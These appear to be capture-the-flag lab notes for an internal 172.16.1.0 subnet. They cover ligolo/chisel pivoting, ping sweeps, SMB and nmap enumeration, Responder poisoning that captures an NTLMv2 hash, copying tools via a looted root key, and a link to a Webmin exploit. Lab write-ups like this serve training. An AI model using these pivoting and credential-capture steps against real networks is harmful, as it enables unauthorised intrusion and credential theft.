3 - 172.16.1.0 Subnet Enum

# Setup Pivot - Setup `ligolo proxy` on Kali ```bash sudo ./proxy -selfcert ``` ![[images/Pasted image 20260617193849.png]] - Setup agent ```bash ./agent -connect 10.10.14.42:11601 -ignore-cert ``` ![[images/Pasted image 20260617193710.png]] - Add dummy IPv4 address for interface and confirm ```bash sudo ip addr add 10.10.10.1/24 dev iface_name ip a ip route ``` ![[images/Pasted image 20260617193837.png]] # Ping Sweep - `fping` ![[images/Pasted image 20260617193901.png]] - confirm with for loop ```bash for i in {1..254} ;do (ping -c 1 172.16.1.$i | grep "bytes from" &) ;done ``` ![[images/Pasted image 20260617194134.png]] - create `hosts.txt` ```bash for i in {1..254} ;do (ping -c 1 172.16.1.$i | grep "bytes from" &) ;done | awk '{print $4}' | cut -d':' -f1 > hosts.txt ``` ![[images/Pasted image 20260617194614.png]] ## Internal `nxc smb` scans - Use current creds > nothing ![[images/Pasted image 20260617201006.png]] - null and guest ![[images/Pasted image 20260617201041.png]] # Start Responder - Setup on proper tunnel interface associated with pivot ![[images/Pasted image 20260617203047.png]] - not getting anything - notice that `autrorote` only assigned an IPv6 address to the iface so `responder` shows an IPv4 that is off ![[images/Pasted image 20260617210044.png]]![[images/Pasted image 20260617210049.png]] - tear-down the `ligolo` iface and tunnel and create our own w/o `autoroute` ```bash sudo ip tuntap add user jacob mode tun ligolo sudo ip link set ligolo up sudo ./proxy -selfcert ./agent -connect 10.10.14.42:11601 -ignore-cert #target machine sudo ip route add 172.16.1.0/24 dev ligolo ``` - try `responder` with `-wFv` poisoning mode - add listeners within ligolo to forward traffic on ports 137 and 445 and setup `responder` on tun0 ![[images/Pasted image 20260618150736.png]] - nothing - try with chisel - setup server ![[images/Pasted image 20260618151156.png]] - setup client to forward traffic on ports 137 and 445 localhost on Kali - `glibc` incompatibility issues ![[images/Pasted image 20260618151206.png]] - build a static version of `chisel` and move to target ![[images/Pasted image 20260618151615.png]] - that works ![[images/Pasted image 20260618151625.png]] - errors with `responder` because chisel has ports 137 and 445 tied up ![[images/Pasted image 20260618152231.png]] - May be worthwhile to also setup on NIX01 - prepare a portable version of `responder` with wheel files ![[images/Pasted image 20260618152610.png]] ```bash # Kali git clone https://github.com/lgandx/Responder.git cd Responder/ mkdir wheels pip download --only-binary=:all:--platform manylinux2014_x86_64 --python-version 3.8 -r requirements.txt -d ./wheels cd .. zip -r responder_ubuntu20.zip Responder scp -i ../loot/nix01.root.id_rsa responder_ubuntu20.zip [email protected]:/root ``` ```bash # target unzip responder_ubuntu20.zip cd Responder sudo pip3 install --no-index --find-links=./wheels -r requirements.txt ``` - throwing an error ![[images/Pasted image 20260618153129.png]] ```bash # Kali pip download typing-extensions>=4.9 --python-version 3.8 --platform manylinux2014_x86_64 --only-binary=:all: scp -i ../../../loot/nix01.root.id_rsa typing_extensions-4.13.2-py3-none-any.whl [email protected]:/root # target mv ../typing_extensions-4.13.2-py3-none-any.whl ./wheels/ sudo pip3 install --no-index --find-links=./wheels -r requirements.txt ``` - now we can run on NIX01 but we are running into conflicts on port 445 ![[images/Pasted image 20260618153545.png]] - shutdown ligolo agent > we got an NTLMv2 hash! ![[images/Pasted image 20260618153709.png]] - crack with # Internal Nmap Scans ## 172.16.1.5 (DANTE-SQL01) - light ![[images/Pasted image 20260617200504.png]] - detailed ![[images/Pasted image 20260617200557.png]] - FTP and NFS look tasty - `flag.txt` in FTP - grab flag with `nxc ftp` ![[images/Pasted image 20260617201912.png]] - MSSQL on 1433 and 49673 - current creds don't work ![[images/Pasted image 20260617202118.png]] - SMB - guest and null dont work ![[images/Pasted image 20260617202221.png]] ## 172.16.1.12 - light ![[images/Pasted image 20260617200833.png]] - detailed ![[images/Pasted image 20260617201208.png]] - FTP, HTTP, HTTPS, MYSQL - default XAMPP dashboards ## 172.16.1.19 - light![[images/Pasted image 20260617201354.png]] - detailed ![[images/Pasted image 20260617201444.png]] - port 8080 has a jenkins server ![[images/Pasted image 20260618155147.png]] ## 172.16.1.20 (DANTE-DC01) - light ![[images/Pasted image 20260617201628.png]] - this is the DC - detailed ![[images/Pasted image 20260617202319.png]] - domain: `dante.local` - forest: `dante.local` - HTTP, HTTPS, SMB, RDP, WINRM ## 172.16.1.13 (DANTE-WS01) - light ![[images/Pasted image 20260617202623.png]] - detailed ![[images/Pasted image 20260617202927.png]] - HTTP, HTTPS, SMB - default XAMPP dashboards ## 172.16.1.101 (DANTE-WS02) - light ![[images/Pasted image 20260617204356.png]] - detailed ## 172.16.1.102 (DANTE-WS03) - light ![[images/Pasted image 20260618202242.png]] - detailed ![[images/Pasted image 20260618202916.png]] ## 172.16.1.10 (DANTE-NIX02) - light![[images/Pasted image 20260617210122.png]] - detailed ![[images/Pasted image 20260617210227.png]] - SSH, HTTP, SMB ## 172.16.1.17 (DANTE-NIX03) - light ![[images/Pasted image 20260617210447.png]] - detailed ![[images/Pasted image 20260617210727.png]] - NOTE: very spicy goodies on ports 80 and 10000 - HTTP, SMB, WEBMIN, MYSQLX - HTTP: 80![[images/Pasted image 20260618155734.png]] - webmin ver. 1.900 - HTTP: 10000 ![[images/Pasted image 20260618155847.png]] - [GitHub - n0obit4/Webmin_1.890-POC: CVE-2019-15107 exploit · GitHub](https://github.com/n0obit4/Webmin_1.890-POC) includes some POCs